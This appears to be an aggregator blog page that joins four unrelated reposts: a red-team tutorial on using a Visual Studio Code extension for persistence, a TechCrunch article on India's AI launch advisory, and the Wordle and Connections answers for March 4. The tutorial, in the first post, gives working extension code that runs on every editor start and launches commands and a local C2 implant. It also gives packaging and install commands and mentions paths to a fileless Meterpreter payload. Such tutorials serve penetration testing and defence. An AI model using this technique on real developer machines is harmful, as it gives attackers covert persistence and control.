March 4, 2024 – Page 8

Persistence – Visual Studio Code Extensions

Leave a Comment / March 4, 2024

It is not uncommon developers or users responsible to write code (i.e. detection engineers using Sigma) to utilize Visual Studio Code as their code editor. The default capability of the product can be extended using extensions such as debuggers and tools to support the development workflow. However, in a development environment that has been compromised during a red team exercise, an arbitrary Visual Studio Code extension can be used for persistence since it will also enable the red team to blend in with the underlying environment. The technique was originally discussed by the company Secarma.

Extension Development

Prior to starting the development of a Visual Studio Code Extension the environment requires the following packages:

Execution of the following commands from the command prompt will install Yeoman and the generator code.

npm install -g yo
npm install -g yo generator-code

The command yo code initiates the extension generator which will generate the necessary files of the extension.

yo code

Using the following commands from the extension folder will initiate Visual Studio Code. Once Visual Studio Code starts, will request for the permission of the user prior to adding any files into the workspace.

cd persistence-pentestlab
code .

The files of interest in an extension are:

package.json
extension.ts

By default the contents of these files will look similar to the pictures below:

Executing the command HelloWorld will display the HelloWorld information message as it will call the function showInformationMessage from the extension.ts file.

According to the Visual Studio Code there are a number of activation events which can be declared in the package.json file. These events could provide a variety of persistence options such as execute a command when a specific language file is opened or during start of Visual Studio Code. The activation event “*” will enforce the extension to execute every time that Visual Studio Code starts.

The following code can be used in the extension.ts file in order to display a message a proof of concept once Visual Studio Code initiates.

import * as vscode from 'vscode';
export function activate(context: vscode.ExtensionContext) {    
let disposable = vscode.commands.registerCommand('persistence-pentestlab.Install', () => {        
vscode.window.showInformationMessage('Implant is executed');
    });    context.subscriptions.push(disposable);
    vscode.commands.executeCommand('persistence-pentestlab.Install');
}
export function deactivate() {}

The image below demonstrates that the message “Implant is executed” has been displayed on the next run of Visual Studio Code.

Command Execution

Now that there is a verification that code can be executed during start, the extension code can be modified to run a command. The following code snippet uses the child_process library to run the whoami command and log the output into the console.

import * as vscode from 'vscode';
export function activate(context: vscode.ExtensionContext) {    
let disposable = vscode.commands.registerCommand('persistence-pentestlab.Install', () => {        
vscode.window.showInformationMessage('Implant is executed');
const cp = require('child_process');
let cmd = 'whoami';cp.exec(cmd, (err: string, stdout: string, stderr: string) => {
    console.log(stdout);
    if (err) {
        console.log(err);
    }
});
    });    
    context.subscriptions.push(disposable);
    vscode.commands.executeCommand('persistence-pentestlab.Install');
}
export function deactivate() {}

Replacing the command with an implant which is stored locally can be used as method to execute arbitrary code.

import * as vscode from 'vscode';
export function activate(context: vscode.ExtensionContext) {    
let disposable = vscode.commands.registerCommand('persistence-pentestlab.Install', () => {        
vscode.window.showInformationMessage('Implant is executed');
const cp = require('child_process');
let cmd = 'C:\\tmp\\demon.x64.exe';cp.exec(cmd, (err: string, stdout: string, stderr: string) => {
    console.log(stdout);
    if (err) {
        console.log(err);
    }
});
    });    
    context.subscriptions.push(disposable);
    vscode.commands.executeCommand('persistence-pentestlab.Install');
}
export function deactivate() {}

Visual Studio Code Extension – Implant Execution

When the extension runs the implant will call back to the Command and Control.

Extension Packaging

Extensions can be packaged using the Visual Studio Code Extension Manager. By default this utility is not present and can be installed using the following command:

npm install -g @vscode/vsce

Executing the following command will package the extension into a .vsix file.

vsce package --allow-missing-repository --allow-star-activation

The packaged extension will appear into the extension folder.

However, the extension will not be installed into the Visual Studio Code until the following command is executed:

code --install-extension persistence-pentestlab-0.0.1.vsix

Extension Load

Since the extension has been installed when the compromised user will initiate Visual Studio Code, the implant will executed and a communication will established with the Command and Control.

The following image demonstrates how the extension will be displayed in the Extensions of Visual Studio Code.

It should be noted that the implant will executed under the context of Visual Studio Code. Execution of Visual Studio Code generates various process instances and therefore the implant will blend in with the environment.

Visual Studio Code Extension – Process Tree

PowerShell

Dropping the implant to disk might not be the safest method to execute code. An alternative approach could be to utilize PowerShell in order to execute a fileless payload.

When the extension loads the payload will executed and a Meterpreter session will established.

Visual Studio Code Extensions – Meterpreter

JavaScript

Edge.js enables users to run .NET code inside Node.js. Therefore Visual Studio Extensions can be developed in JavaScript with embedded C# code which will extend the offensive capability of the arbitrary extension. The Edge.js and the electron-edge.js can be installed by executing the commands below:

npm install --save edge-js

npm install --save electron-edge-js

The following code will display a message box as a proof of concept that .NET was executed from a JavaScript file.

var edge = require('edge-js');
var msgBox = edge.func(function() {/*
    using System;
    using System.Threading.Tasks;
    using System.Runtime.InteropServices;
    
    class Startup
    {
        [DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        private static extern int MessageBox(IntPtr hWnd, string lpText, string lpCaption, uint uType);
        
        public async Task<object> Invoke(dynamic input)
        {
            MessageBox(IntPtr.Zero,
                "Visit pentestlab.blog",
                "Pentestlab.blog",
                0);
            return null;
        }
    }
*/});

msgBox(null, function (error, result) {
    if (error) throw error;
});

The node binary can be used to execute the arbitrary JavaScript file.

node .\msgBox.js

References

Source link

Persistence – Visual Studio Code Extensions Read More »

India reverses AI stance, requires government approval for model launches | TechCrunch

Leave a Comment / March 4, 2024

India has waded into global AI debate by issuing an advisory that requires tech firms to get government permission before launching new models.

India’s Ministry of Electronics and IT issued the advisory to firms on Friday. The advisory, not published on public domain but a copy of which TechCrunch has reviewed, also asks tech firms to ensure that their services or products “do not permit any bias or discrimination or threaten the integrity of the electoral process.”

Though the ministry admits the advisory is not legally binding, India’s IT Deputy Minister Rajeev Chandrasekhar says the notice is “signalling that this is the future of regulation.”

He adds: “We are doing it as an advisory today asking you to comply with it.”

The ministry cites power granted to it through the IT Act, 2000 and IT Rules, 2021 in its advisory. It seeks compliance with “immediate effect” and asks tech firms to submit “Action Taken-cum-Status Report” to the ministry within 15 days.

The new advisory, which also asks tech firms to “appropriately” label the “possible and inherent fallibility or unreliability” of the output their AI models generate, marks a reversal from India’s previous hands-off approach to AI regulation. Less than a year ago, the ministry had declined to regulate AI growth, instead identifying the sector as vital to India’s strategic interests.

India’s move has taken many industry executives by surprise. Many Indian startups and VCs say they have been spooked by the new advisory and believe such regulation will hinder the nation’s ability to compete in the global race, where it is already lagging behind.

“I was such a fool thinking I will work bringing GenAI to Indian agriculture from SF,” wrote Pratik Desai, founder of startup Kisan AI. “We were training multimodal low cost pest and disease model, and so excited about it. This is terrible and demotivating after working 4yrs full time brining AI to this domain in India.”

Many Silicon Valley leaders also criticized India’s policy shift. Aravind Srinivas, co-founder and chief executive of Perplexity AI, one of the hottest AI startups, said the new advisory from New Delhi was a “bad move by India.”

Martin Casado, a partner at venture firm Andreessen Horowitz, said, “Good fucking lord. What a travesty.”

The advisory follows Chandrasekhar expressing his disappointment in a certain response by Google’s Gemini last month. A user last month asked Gemini, previously known as Bard, whether India’s PM Narendra Modi was a fascist.

In response, Gemini — citing experts it didn’t identity — said Modi had been accused of implementing policies that some had characterised as fascist. Chandrasekhar reacted to the exchange by warning Google that such responses were “direct violations” of the IT Rules, 2021 as well as “several provisions of the Criminal Code.”

Non-compliance with the provisions of the IT Act and IT Rules would result in “potential penal consequences to the intermediaries or platforms or its users when identified,” the advisory adds.

Source link

India reverses AI stance, requires government approval for model launches | TechCrunch Read More »

Wordle today: Here’s the answer and hints for March 4

Leave a Comment / March 4, 2024

Oh hey there! If you’re here, it must be time for Wordle. As always, we’re serving up our daily hints and tips to help you figure out today’s answer.

If you just want to be told today’s word, you can jump to the bottom of this article for March 4’s Wordle solution revealed. But if you’d rather solve it yourself, keep reading for some clues, tips, and strategies to assist you.

**Where did Wordle come from?**

Originally created by engineer Josh Wardle as a gift for his partner, Wordle rapidly spread to become an international phenomenon, with thousands of people around the globe playing every day. Alternate Wordle versions created by fans also sprang up, including battle royale Squabble, music identification game Heardle, and variations like Dordle and Quordle that make you guess multiple words at once.

Wordle eventually became so popular that it was purchased by the New York Times, and TikTok creators even livestream themselves playing.

Not the day you’re after? Here’s the solution to yesterday’s Wordle.

**What’s the best Wordle starting word?**

The best Wordle starting word is the one that speaks to you. But if you prefer to be strategic in your approach, we have a few ideas to help you pick a word that might help you find the solution faster. One tip is to select a word that includes at least two different vowels, plus some common consonants like S, T, R, or N.

**What happened to the Wordle archive?**

The entire archive of past Wordle puzzles used to be available for anyone to enjoy whenever they felt like it. Unfortunately, it has since been taken down, with the website’s creator stating it was done at the request of the New York Times.

**Is Wordle getting harder?**

It might feel like Wordle is getting harder, but it actually isn’t any more difficult than when it first began. You can turn on Wordle‘s Hard Mode if you’re after more of a challenge, though.

**Here’s a subtle hint for today’s Wordle answer:**

A hot glowing body of fire.

**Does today’s Wordle answer have a double letter?**

There are no letters that appear twice.

**Today’s Wordle is a 5-letter word that starts with…**

Today’s Wordle starts with the letter F.

**What’s the answer to Wordle today?**

Get your last guesses in now, because it’s your final chance to solve today’s Wordle before we reveal the solution.

Drumroll please!

The solution to Wordle #989 is…

FLAME.

Don’t feel down if you didn’t manage to guess it this time. There will be a new Wordle for you to stretch your brain with tomorrow, and we’ll be back again to guide you with more helpful hints.

Reporting by Caitlin Welsh, Sam Haysom, Amanda Yeo, Shannon Connellan, Cecily Mauran, Mike Pearl, and Adam Rosenberg contributed to this article.

Source link

Wordle today: Here’s the answer and hints for March 4 Read More »

NYT Connections today: See hints and answers for March 4

Leave a Comment / March 4, 2024

Connections is the latest New York Times word game that’s captured the public’s attention. The game is all about finding the “common threads between words.” And just like Wordle, Connections resets after midnight and each new set of words gets trickier and trickier—so we’ve served up some hints and tips to get you over the hurdle.

If you just want to be told today’s puzzle, you can jump to the end of this article for March 4’s Connections solution. But if you’d rather solve it yourself, keep reading for some clues, tips, and strategies to assist you.

**What is Connections?**

The NYT‘s latest daily word game has become a social media hit. The Times credits associate puzzle editor Wyna Liu with helping to create the new word game and bringing it to the publications’ Games section. Connections can be played on both web browsers and mobile devices and require players to group four words that share something in common.

Tweet may have been deleted

Each puzzle features 16 words and each grouping of words is split into four categories. These sets could comprise of anything from book titles, software, country names, etc. Even though multiple words will seem like they fit together, there’s only one correct answer. If a player gets all four words in a set correct, those words are removed from the board. Guess wrong and it counts as a mistake—players get up to four mistakes until the game ends.

Tweet may have been deleted

Players can also rearrange and shuffle the board to make spotting connections easier. Additionally, each group is color-coded with yellow being the easiest, followed by green, blue, and purple. Like Wordle, you can share the results with your friends on social media.

**Here’s a hint for today’s Connections categories**

Want a hit about the categories without being told the categories? Then give these a try:

Yellow: Clue locations
Green: Co-worker
Blue: Easter items
Purple: Types of Moles

**Here are today’s Connections categories**

Need a little extra help? Today’s connections fall into the following categories:

Looking for Wordle today? Here’s the answer to today’s Wordle.

Ready for the answers? This is your last chance to turn back and solve today’s puzzle before we reveal the solutions.

Drumroll, please!

The solution to Connections #267 is…

**What is the answer to Connections today**

Rooms in the Game Clue: HALL, LIBRARY, LOUNGE, STUDY
Colleague: ASSOCIATE, FELLOW, PARTNER, PEER
Seen During Easter: BUNNY, EGG, JELLY, PEEP
What A Mole Can Be: ANIMAL, BIRTHMARK, SPY, UNIT

Don’t feel down if you didn’t manage to guess it this time. There will be new Connections for you to stretch your brain with tomorrow, and we’ll be back again to guide you with more helpful hints.

Is this not the Connections game you were looking for? Here are the hints and answers to yesterday’s Connections.

Source link

NYT Connections today: See hints and answers for March 4 Read More »